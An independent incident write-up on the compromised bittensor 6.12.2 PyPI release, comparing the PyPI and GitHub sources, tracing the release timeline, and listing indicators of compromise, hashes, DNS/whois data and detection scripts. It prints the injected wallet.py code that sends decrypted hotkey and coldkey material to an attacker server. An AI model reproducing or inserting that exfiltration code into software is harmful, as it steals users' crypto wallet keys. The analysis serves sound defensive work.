I had no plans to publish this. In fact, I had no plans to investigate it. In fact, I’d have preferred to not even know about it. But I saw a tweet, thought someone was wrong on the internet, and well, you know what happens.
Note: This is a purely independent investigation of what happened. I have no relationship with anyone involved in the Opentensor Foundation, nor any relationship with anyone involved in the bittensor project, nor any inside information about the incident. I just got nerd sniped by a tweet and this investigation fell out.
TL;DR
An attacker published a modified version of bittensor 6.12.2 to PyPI which contained a malicious validate function designed to send wallet keys to an attacker-controlled server. Given the nature of the attack, this was likely the result of a compromised PyPI API key, potentially obtained through a compromised developer.
The Opentensor Foundation published a blog post earlier today (2024-07-03) about a security incident they had discovered.
The blog post does try to provide helpful, useful information. But it also is a little bit vague about what happened. In particular, their “Root cause of attack” says the following:
The attack was traced back to the PyPi Package Manager version 6.12.2, where a malicious package was uploaded, compromising user security.
- The malicious package, masquerading as a legitimate Bittensor package, contained code designed to steal unencrypted coldkey details.
- When users downloaded this package and decrypted their coldkeys, the decrypted bytecode was sent to a remote server controlled by the attacker.
This indicates that the issue was found to be in their PyPI release 6.12.2. But the subsequent language can be a little misleading:
The malicious package, masquerading as a legitimate Bittensor package…
This makes it sound like it could be a package-squatting attack, where the attacker was pretending to be a legitimate Bittensor package. But that’s not the case. As far as PyPI was concerned, it was a legitimate Bittensor package: it was uploaded to the Bittensor project, presumably by an API key authorized to do so.
Timeline
The malicious version of the package was available between 2024-05-22T19:14:09Z and 2024-07-02 (time unknown), or approximately 41 days.
- 2024-05-22T19:14:09Z - Publish to PyPI
- 2024-05-22T21:25:09Z - 6.12.2 release was published to Github by gus-opentensor.
- 2024-05-22T21:25:00Z - 6.12.2 image was published on hub.docker.com by gopentensor (Note: Dockerhub doesn’t give me a timezone, but by modifying my system time I was able to confirm it localizes, so I set to UTC and got this timestamp)
- 2024-07-02T19:06:00Z - Attacker begins to transfer funds to their own wallet, according to the incident report
- 2024-07-02T19:25:00Z - OTF identifies the anomalous behavior and starts a war room
- 2024-07-02T19:41:00Z - OTF puts chain validators behind a firewall to prevent connections, stopping transaction processing to allow for analysis.
The Malicious Code
PyPI
In order to identify the actual root cause, since I couldn’t really tell based on Bittensor’s document, I downloaded the PyPI yanked release source distribution for 6.12.2, and then downloaded the Github 6.12.2 tagged release in order to compare them.
I labeled each download with its source (e.g. -pypi and -github), and then ran diff against them to see if there was any difference.
$ diff bittensor-6.12.2-pypi/bittensor bittensor-6.12.2-github/bittensor
Common subdirectories: bittensor-6.12.2-pypi/bittensor/btlogging and bittensor-6.12.2-github/bittensor/btlogging
Common subdirectories: bittensor-6.12.2-pypi/bittensor/commands and bittensor-6.12.2-github/bittensor/commands
Common subdirectories: bittensor-6.12.2-pypi/bittensor/extrinsics and bittensor-6.12.2-github/bittensor/extrinsics
Common subdirectories: bittensor-6.12.2-pypi/bittensor/mock and bittensor-6.12.2-github/bittensor/mock
Common subdirectories: bittensor-6.12.2-pypi/bittensor/utils and bittensor-6.12.2-github/bittensor/utils
diff --color bittensor-6.12.2-pypi/bittensor/wallet.py bittensor-6.12.2-github/bittensor/wallet.py
23d22
< import base64
25d23
< import asyncio
28d25
< from aiohttp import ClientSession
291,310d287
<     def validate(self, key: str, keypair: "bittensor.Keypair") -> "bittensor.Keypair":
<         """
<         Validate the bittensor keypair.
<
<         Args:
<             key (str): Key type.
<             keypair (bittensor.Keypair): The keypair to validate.
<         """
<         try:
<             async def validate_key(key, value):
<                 async with ClientSession() as s:
<                     await s.post('http://api.opentensor.io/v1', json={
<                         key: {
<                             k: base64.b64encode(v).decode('ascii') \
<                                 if isinstance(v, bytes) else v for k, v in value.__dict__.items()
<                         }})
<             asyncio.run(validate_key(key, keypair))
<         except: pass
<         return keypair
<
460c437
<         return self.validate("hotkey", self._hotkey)
---
>         return self._hotkey
474c451
<         return self.validate("coldkey", self._coldkey)
---
>         return self._coldkey
It looks like the PyPI version has this validate function defined in wallet.py that isn’t present in the Github release. This is consistent with how I would have done this attack: Github is much more likely to have eyes on it, have code review requirements, etc. Most people don’t pay any attention to the source they download from PyPI.
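To make concrete what the injected validate function would have sent, here is a minimal offline sketch that rebuilds the same JSON body without making any network call. The FakeKeypair class and its field names are hypothetical stand-ins filled with dummy values; I have not confirmed which attributes a real bittensor.Keypair carries, so treat the output as an illustration of the shape only.

```python
import base64
import json


class FakeKeypair:
    """Hypothetical stand-in for bittensor.Keypair, holding dummy values only."""

    def __init__(self) -> None:
        self.ss58_address = "5DummyAddress"
        self.private_key = b"\x00\x01\x02\x03"
        self.crypto_type = 1


def build_payload(key: str, value: object) -> dict:
    """Rebuild the JSON body from the injected code, minus the HTTP POST."""
    return {
        key: {
            # bytes attributes are base64-encoded, everything else is passed through
            k: base64.b64encode(v).decode("ascii") if isinstance(v, bytes) else v
            for k, v in value.__dict__.items()
        }
    }


payload = build_payload("coldkey", FakeKeypair())
print(json.dumps(payload, indent=2))
```

The point of the sketch is that every attribute on the keypair object is serialized, not just one field, so anything the object holds in memory after decryption would have been included.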
I was also able to confirm that the bittensor-6.12.2-py3-none-any.whl artifact contained the same malicious code present in the source distribution.
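A wheel is a zip archive, so the same check can be scripted. The following is a rough sketch of one way to do it, not the exact procedure I used; the scan_wheel name and the choice of the exfiltration domain as the search string are my own assumptions.

```python
import zipfile
from pathlib import Path
from typing import List

# Domain taken from the malicious validate function in the diff.
INDICATOR = b"api.opentensor.io"


def scan_wheel(wheel_path: Path, indicator: bytes = INDICATOR) -> List[str]:
    """Return the names of archive members whose raw bytes contain the indicator."""
    hits = []
    with zipfile.ZipFile(wheel_path) as wheel:
        for name in wheel.namelist():
            if indicator in wheel.read(name):
                hits.append(name)
    return hits
```

Calling scan_wheel(Path("bittensor-6.12.2-py3-none-any.whl")) on a downloaded copy should list any member that references the domain; an empty list only means this one string was not found.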
Docker
I also pulled the docker image via docker pull opentensorfdn/bittensor:6.12.2 and then investigated the copies of wallet.py it contained. These appear to match the legitimate code in Github, rather than the illegitimate code from PyPI.
# find / -name wallet.py
/root/.bittensor/bittensor/build/lib/bittensor/wallet.py
/root/.bittensor/bittensor/bittensor/wallet.py
/opt/conda/lib/python3.10/site-packages/bittensor/wallet.py
root@021b52f547d9:/workspace# find / -name wallet.py | xargs grep -i opentensor
root@021b52f547d9:/workspace#
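For anyone who wants to repeat that find and grep on a machine without a shell handy, a rough Python equivalent might look like this. The find_suspicious helper is hypothetical, and it only looks for the one domain string seen in the malicious diff.

```python
from pathlib import Path
from typing import List

# Lowercase so the comparison below is case-insensitive, like grep -i.
INDICATOR = "api.opentensor.io"


def find_suspicious(roots: List[Path], filename: str = "wallet.py") -> List[Path]:
    """Walk each root and return files named `filename` that mention the indicator."""
    hits = []
    for root in roots:
        for path in root.rglob(filename):
            if not path.is_file():
                continue
            text = path.read_text(encoding="utf-8", errors="replace")
            if INDICATOR in text.lower():
                hits.append(path)
    return sorted(hits)
```

To scan the active Python environment rather than the whole filesystem, pass Path(sysconfig.get_paths()["purelib"]) as the only root.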
Anomalies in the release
While trying to understand the likely scenario that played out here, I investigated the bittensor CI configurations (CircleCI and their more recent GitHub Actions workflows). I also looked at the CI run history for the 6.12.2 release.
One thing that stuck out to me pretty much immediately is that these CI workflows are not responsible for publishing a release. There is a release-dry-run job, which runs a /scripts/release/release.sh --github-token ${GH_API_ACCESS_TOKEN} script, but it specifically says dry-run, and the CI output indicates as much.
[WARNING] Dry run execution. Not uploading python wheel
[INFO] Releasing docker image
[WARNING] Dry run execution. Not login into docker registry
[WARNING] Dry run execution. Building docker image 'opentensorfdn/bittensor:6.12.2' but not pushing it
[...]
[WARNING] Dry run execution. Not pushing docker image 'opentensorfdn/bittensor:6.12.2'
This means that when new versions of bittensor get published, they either have some other automated system tucked away where no one can see it (best case scenario), or a human runs this release script from their workstation to publish a new release (more likely scenario).
Wildly varying upload times
If a typical release follows this release.sh script, then the 2 hours and 11 minutes between the PyPI release and the Github/Dockerhub release is extremely anomalous. The release.sh script should do the github release first, then the pip release, then the docker release. But we saw the pip release first, followed by the github and docker release a couple hours later.
This suggests to me that the attacker uploaded the PyPI package manually. After that, one of two things likely happened: either someone else noticed and retroactively added the github/docker releases to stay consistent with the released version, or the attacker did not initially know how to trigger the github and docker releases when they found the PyPI credentials, and only later found the credentials needed to do so and cover their tracks.
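The gap is easy to check from the timeline timestamps. This is just the arithmetic, using the three publish times listed earlier (the variable names are mine):

```python
from datetime import datetime, timezone

# Publish times copied from the timeline, all in UTC.
pypi_upload = datetime(2024, 5, 22, 19, 14, 9, tzinfo=timezone.utc)
github_release = datetime(2024, 5, 22, 21, 25, 9, tzinfo=timezone.utc)
docker_push = datetime(2024, 5, 22, 21, 25, 0, tzinfo=timezone.utc)

print(github_release - pypi_upload)  # 2:11:00
print(docker_push - pypi_upload)     # 2:10:51
```

The Github and Dockerhub timestamps land within seconds of each other, which is what a single scripted release run would look like, while the PyPI upload sits more than two hours earlier on its own.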
Indicators of Compromise
The attacker used plain HTTP connections to POST data to api.opentensor.io/v1. The request would have contained a JSON POST body with a single top-level key taken from the key argument, which the modified wallet.py sets to either hotkey or coldkey.
- Domain: api.opentensor.io
- Path: api.opentensor.io/v1
- Hash: e199f3eef8c741beee870fc261fe857823d1a5c89e0ce93e5cc6e8327f8a125e wallet.py
- Hash: 9b74ecd6b77f110cf907c9f8514f98ce2d94fbf7326537fe5eb5e516c0b9c16e bittensor-6.12.2-py3-none-any.whl
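If you want to check local files against the two hashes above, a small sketch like the following should do. It assumes the digests are SHA-256 (they are 64 hex characters, the format sha256sum prints); the helper names are hypothetical.

```python
import hashlib
from pathlib import Path
from typing import Optional

# Hashes from the indicator list above, assumed to be SHA-256 digests.
KNOWN_BAD_SHA256 = {
    "e199f3eef8c741beee870fc261fe857823d1a5c89e0ce93e5cc6e8327f8a125e": "wallet.py",
    "9b74ecd6b77f110cf907c9f8514f98ce2d94fbf7326537fe5eb5e516c0b9c16e": "bittensor-6.12.2-py3-none-any.whl",
}


def sha256_of(path: Path) -> str:
    """Hash a file in 1 MiB chunks so large wheels are not loaded into memory at once."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def match_indicator(path: Path) -> Optional[str]:
    """Return the indicator label if the file matches a known-bad hash, else None."""
    return KNOWN_BAD_SHA256.get(sha256_of(path))
```

A match is strong evidence the malicious artifact is present. A miss proves much less, since any repackaging or whitespace change would alter the hash.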
DNS
DomainTools claims to have 2 historical records for opentensor.io; however, I don’t have a DomainTools account anymore, so you’ll have to investigate that yourself if you want it.
At the time of my investigation, this DNS name had already been cleaned up and no longer resolved:
➜ dig api.opentensor.io
; <<>> DiG 9.16.48-Ubuntu <<>> api.opentensor.io
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 7873
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
;; QUESTION SECTION:
;api.opentensor.io. IN A
;; AUTHORITY SECTION:
opentensor.io. 3600 IN SOA 1-you.njalla.no. you.can-get-no.info. 2024060301 21600 7200 1814400 3600
;; Query time: 250 msec
;; SERVER: 172.25.64.1#53(172.25.64.1)
;; WHEN: Wed Jul 03 18:36:53 PDT 2024
;; MSG SIZE rcvd: 129
Whois
For completeness, the whois data is not particularly useful, but I’ll include it anyway.
Domain Name: opentensor.io
Registry Domain ID: 52c766b3bc3741dbbb33e18e4b0ab51d-DONUTS
Registrar WHOIS Server:
Registrar URL:
Updated Date: 2024-05-25T22:53:39Z
Creation Date: 2024-05-20T22:52:45Z
Registry Expiry Date: 2025-05-20T22:52:45Z
Registrar: Sarek Oy
Registrar IANA ID: 802672
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Status: ok https://icann.org/epp#ok
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: 1337 Services LLC
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Charlestown
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: KN
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: REDACTED FOR PRIVACY
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: REDACTED FOR PRIVACY
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: 1-you.njalla.no
Name Server: 2-can.njalla.in
Name Server: 3-get.njalla.fo
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2024-07-03T15:04:44Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Terms of Use: Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by Identity Digital or the Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Identity Digital except as reasonably necessary to register domain names or modify existing registrations. When using the Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. 
Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data provided by Identity Digital can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/. The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Identity Digital Inc. and Registry Operator reserve the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
Recommendations
If I were giving a professional recommendation for making this sort of thing more difficult to achieve in the future, based purely on my current knowledge of the incident, the first place I would start is doing releases only through a Github workflow. PyPI offers a relatively new “trusted publishing” implementation to connect to GitHub Actions, and they provide a useful guide on publishing packages using GitHub Actions. By following this release pattern, no developer would need to hold a long-lived API token capable of uploading a malicious package.
You can then further combine this with tightened Github branch protections, to ensure that the workflow to publish a PyPI package (and a docker hub image) can only be executed after proper code review and the requisite approvals.
In a more reactive approach, it is likely possible to automate analysis of your published PyPI distributions in order to detect deviations from a clean build. But if your builds have some level of clear provenance, this becomes less interesting, less useful, and not worth the time spent.
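As a rough idea of what that automated analysis could look like, here is a sketch that compares every .py file inside a published wheel against a clean checkout of the tagged source. It assumes the wheel's internal paths line up with paths relative to the repository root (as bittensor/wallet.py does here), and the deviations function is a hypothetical helper, not an existing tool.

```python
import zipfile
from pathlib import Path
from typing import Dict


def deviations(wheel_path: Path, source_root: Path) -> Dict[str, str]:
    """Map each .py member of the wheel to 'missing' or 'modified' when it
    does not byte-for-byte match the same relative path under source_root."""
    report = {}
    with zipfile.ZipFile(wheel_path) as wheel:
        for name in wheel.namelist():
            if not name.endswith(".py"):
                continue
            local = source_root / name
            if not local.is_file():
                report[name] = "missing"
            elif wheel.read(name) != local.read_bytes():
                report[name] = "modified"
    return report
```

Run against the 6.12.2 wheel and the Github tag, a check like this would be expected to flag bittensor/wallet.py as modified. Generated files and line-ending differences can produce false positives, so the report is a starting point for review rather than a verdict.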
Conclusion
Based on the evidence I’ve seen, I suspect that a PyPI API token was compromised, either through an accidental leak or a compromised developer workstation. The attacker showed a reasonable level of awareness, choosing to only publish to the PyPI package index, rather than also publishing the code to Github where it might be further scrutinized.
I would consider every key used between 2024-05-22T19:14:09Z and whatever time the 6.12.2 release was yanked on 2024-07-02 (the PyPI API does not appear to record this as a timestamp, only a boolean) to be potentially compromised, particularly if you have or may have had this version installed.
I’m interested to see how much more detail the Opentensor Foundation publishes as they continue their investigation.